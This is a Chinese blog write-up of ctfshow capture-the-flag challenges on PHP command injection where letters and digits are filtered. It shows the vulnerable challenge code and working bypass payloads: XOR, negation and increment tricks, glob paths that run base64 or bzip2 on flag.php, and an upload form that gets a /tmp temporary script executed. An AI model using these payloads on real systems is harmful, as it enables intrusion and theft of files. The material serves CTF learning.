ctfshow命令执行之无数字字母

最新推荐文章于 2024-02-26 11:11:28 发布
最新推荐文章于 2024-02-26 11:11:28 发布
阅读量3.3k 收藏 6
点赞数 2
分类专栏: ctfshow ctf 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54515836/article/details/113305690
版权

命令执行-无数字字母getshell

前言

做ctfshow的时候,碰到命令执行的题,发现这两种类型的题很有趣,学到了很多知识。
前置知识:
shell下可以利用.来执行任意脚本

Linux文件名支持用glob通配符代替

一、无字母命令执行

方法1

异或:在PHP中,两个字符串执行异或操作以后,得到的还是一个字符串。所以,我们找到某两个非字母、数字的字符,他们的异或结果是这个字母即可。

方法2

取反:将汉字(%ff%ff%ff)中的某个字符取出来,来进行取反,即可得到字母

例如~(‘和’{2})=s,意思是将代表和的第二个字符取出,来进行取反。

PHP由于弱类型这个特性,true的值为1,故true+true==2,也就是('>'>'<')+('>'>'<')==2

方法3

位运算:也就是说,'a'++ => 'b''b'++ => 'c'… 所以,我们只要能拿到一个变量,其值为a,通过自增操作即可获得a-z中所有字符。

echo ''.[]

在PHP中,如果强制连接数组和字符串的话,数组将被转换成字符串,其值为Array再取第一个或者第四个即可得到a或者A

$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S

ctfshow例题1

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}

先放大概了解下下一个思路payload: ?c=/???/????64%20????.???
?c=/???/???/???2 ???.??? —》 然后在url + /flag.php.bz2
前置知识:
bin目录:

bin为binary的简写主要放置一些 系统的必备执行档例如:cat、cp、chmod df、dmesg、gzip、kill、ls、mkdir、more、mount、rm、su、tar、base64等

这里我们可以利用 base64 中的64 进行通配符匹配 即 /bin/base64 flag.php 对应的就是/???/???64%20???.???

另外一种payload
/usr/bin目录:

主要放置一些应用软件工具的必备执行档例如c++、g++、gcc、chdrv、diff、dig、du、eject、elm、free、gnome*、 zip、htpasswd、kfm、ktop、last、less、locale、m4、make、man、mcopy、ncftp、 newaliases、nslookup passwd、quota、smb*、wget等。

我们可以利用/usr/bin下的bzip2

意思就是说我们先将flag.php文件进行压缩,然后再将其下载

二、无字母数字命令执行

 <?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}

解题思路
上传一个可以上传文件的post数据包(我是上传到自己的vps)

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>POST数据包POC</title>
</head>
<body>
<form action="http://xxxxxxxxxxxxxxxxxxx.chall.ctf.show/" method="post" enctype="multipart/form-data">
<!--链接是当前打开的题目链接-->
    <label for="file">文件名:</label>
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="提交">
</form>
</body>
</html>

在这个页面上上传1.php,然后抓包

#!/bin/sh
ls

构造好payload,执行命令。
payload构造如下

  • 用. file执行文件,是不需要file有x权限的。所以,如果目标服务器上有一个我们可控的文件,就可以利用.执行它。

  • 我们可以发送一个上传文件的POST包,此时PHP会将我们上传的文件保存在临时文件夹下,php的上传实际上是接受multipart/form-data然后将它保存在临时文件中,php.ini中设置的upload_tmp_dir就是这个临时文件的保存目录。
    php接收到上传的POST请求,就会保存一个临时文件,且命名规则一直是/tmp/phpXXXXXX,文件名最后6个字符是随机的大小写字母。(可参考后面总结中颖奇’blog,里面有详细说明)

  • Linux下的glob通配符

	*可以代替0个及以上任意字符
	?可以代表1个任意字符

那么,/tmp/phpXXXXXX就可以表示为/*/?????????/???/?????????。但是要注意通配符匹配到的文件很多。

  • glob支持用[^x]的方法来构造“这个位置不是字符x”

所以可以将一些特殊字符给排除,例如:

php_333  -> ???[^_ ]???,即可排除php_333。
  • glob支持利用[0-9]来表示一个范围。可见大写字母位于@[之间,可以利用[@-[]来表示大写字母,通过这一步即可排除其他干扰选项。

最后的payload

?c=.+/???/????????[@-[]

在这里插入图片描述

总结

参考文章:https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html
https://www.gem-love.com/websecurity/1407.html#PHP%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C
HoAd's blog
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow web41 无字母数字命令执行
Sapphire037的博客
10-30 2179
1 首先,捋一捋思路,我们可以先看过滤的字符 比如/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i或者/[a-z0-9]/is 这里可以先看P神的一些不包含数字字母的webshell ,大概意思就是通过一些字符互相运算后构造得到我们的payload,了解基本原理之后,我们再看ctfshow中的这样一道例题 <?php /* # -*- coding: utf-8 -*- # @Author: 羽 # @Date: 2020-09-05 20:31
命令执行-无字母数字webshell
leekos的博客,分享web安全相关知识~
12-26 1975
命令执行字母数字webshell
【PHP-CTF】无字母数字webshell
尚未佩妥剑 转眼便江湖
10-31 7974
PHP无字母数字构造Webshell 题目 index.php: &lt;?php include 'flag.php'; if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)&gt;40){ //检测字符长度 die("Long."); } if(preg_match("...
字母数字命令执行(ctfshow web入门 56)
Firebasky的博客
09-12 2870
前面的一篇文章和这道题一样的做法 无字母数字命令执行(ctfshow web入门 55) 需要注意的是:每次上传的文件不一定有大写的文件名,需要多上传几次
字母数字rce(ctfshow web入门56)
L1ni01
11-01 3472
字母数字rce(ctfshow web入门56) 我们根据这一题直接进入主题 //web56 <?php // 你们在炫技吗? if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){ system($c); } }else{ highlight_file(__FILE__); } 过滤
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow 红包题第二弹(无数字字母无~^RCE)
qq_44657899的博客
08-14 3493
颖奇L’Amore师傅wp 这道题啥也不会,总结下知识点吧。 文章目录0x01 PHP上传机制0x02 PHP命令执行0x03 通配符与无字母数组命令执行解题 0x01 PHP上传机制 php文件上传时会先将上传的文件保存到upload_tmp_dir该配置目录下,这里为/tmp,而上传页面只负责把该文件拷贝到目标目录。也就是说不管该php页面有没有文件上传功能,我们只要上传了文件,该文件就会被上传到upload_tmp_dir配置的目录下,上传完后会被删除。 这里本地实验了一下,的确如此,我使用的是wi
【ctf】命令执行漏洞(四)
wlllllianqing的博客
10-18 1605
【ctf】命令执行漏洞(四) 无字母getshell “^”异或字符 表示你输入的字符按位异或 0^1=1 0^0=0 "~"取反字符 表示你输入的字符按位取反 ~(’0‘)=1 当url传入参数时,特殊的字符转换成ASCII码,格式为:%加字符的ASCII码,即一个百分号%,后面跟对应字符的ASCII(16进制)码值 执行的时候要进行一次 URL 编码,否则 Payload 无法执行。 自增: 如果我们已经构造出一个字母,则可以使用自增来更方便得获取其他字符 ...
字母数字webshell总结
hackzkaq的博客
05-07 1914
零基础学黑客,搜索公众号:白帽子左一 关于无字母数字Webshell这个话题,可以说是老生常谈了。之前打 CTF 的时候也经常会遇到,每次都让人头大,所谓无字符webshell,其基本原型就是对以下代码的绕过: <?php if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) { eval($_GET['shell']); } ## 基础知识 ## PHP中的异或 来看这样一段代码: <?php echo "5"^"Z"; ?> 结果
安鸾渗透CTF训练之bash
LHBD_R的博客
11-07 1472
CTF:CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式 bash:Unix shell的一种,Bash是一个命令处理器,通常运行于文本窗口中,并能执行用户直接输入的命令。Bash还能从文件中读取命令,这样的文件称为脚本 Linux中>&或者>&的意思:将标准错误输出重定向到标准输出 >:指将指定的文件重定向 &:表示任务在后台执行 ...
ctfshow-web入门——命令执行(2)(web41-web57)
m0_62905745的博客
03-16 998
本篇文章是ctfshow的web入门部分的命令执行部分wp(web41-web 57),包括一些题目解答,自己的笔记和总结,有错误还希望大家指正,一起学习进步!
BUUCTF xor
m0_49025459的博客
02-17 290
然后我们用python写个脚本,来a^b=c 等于 a^c=b函数还还原出,flag。由下面的代码我们可知,在global存放的字符串是执行过上述算法后得到的字符串。由下面的代码我们可知,将输入的字符串从第二位开始,后一位与前一位异或。由下面的代码我们可知,字符串的长度为33位。跳到如下界面后,我们再次双击,下面的字符。我们就找到了,我们需要去疑惑的字符串了。然后使用按键F5,查看一下主函数。然后我们来分析一下这个这串代码。下载附件,用IDA-64打开。
p84 CTF夺旗-PHP弱类型&异或取反&序列化&RCE
weixin_43263566的博客
03-26 1816
p84 CTF夺旗-PHP弱类型&异或取反&序列化&RCE
CTFShow _新手必刷_菜狗杯:你会数数吗
最新发布
“the quieter you become, the more you are able to hear”
02-26 951
发现除图上几部分是用左右大括号括起来之外,其余都只有半边括号,于是尝试把图中字符串拼接起来 ctfshow{......}提交,思来想去,琢磨了半天“数数”的含义......无果。随手搜了一下字符“c”“t”,里边给出两段字符串,有大括号,说明不是base64,仔细观察,没发现什么特别。发现确实有“ctf”字眼,但是看前看后完全没有关联。
BUUCTF一道无字母数字RCE题目
m0_74989372的博客
08-16 220
接下来到了绕过disable_function阶段,在蚁剑的工具里有绕过的插件(插件市场里挂vpn下载),选择模式运行后会自动打开一个虚拟终端,此时运行readflag文件即可得到flag。换一种思路,构造我们动态调用的地方,第一个小括号内为_GET的取反,也就是说$_就相当于_GET,下图的含义为$_GET[__]($_GET[___]);此时我们拥有了__和___两个可以动态调用的点,接下来传参,第二个数值在括号里面,所以可以用eval,测试木马发现可以执行。换用phpinfo()试试。
ctfshow web入门命令执行
09-05
- *1* *3* [ctfshow web入门之命令执行](https://blog.csdn.net/uuzfumo/article/details/128357863)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

HoAd's blog

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值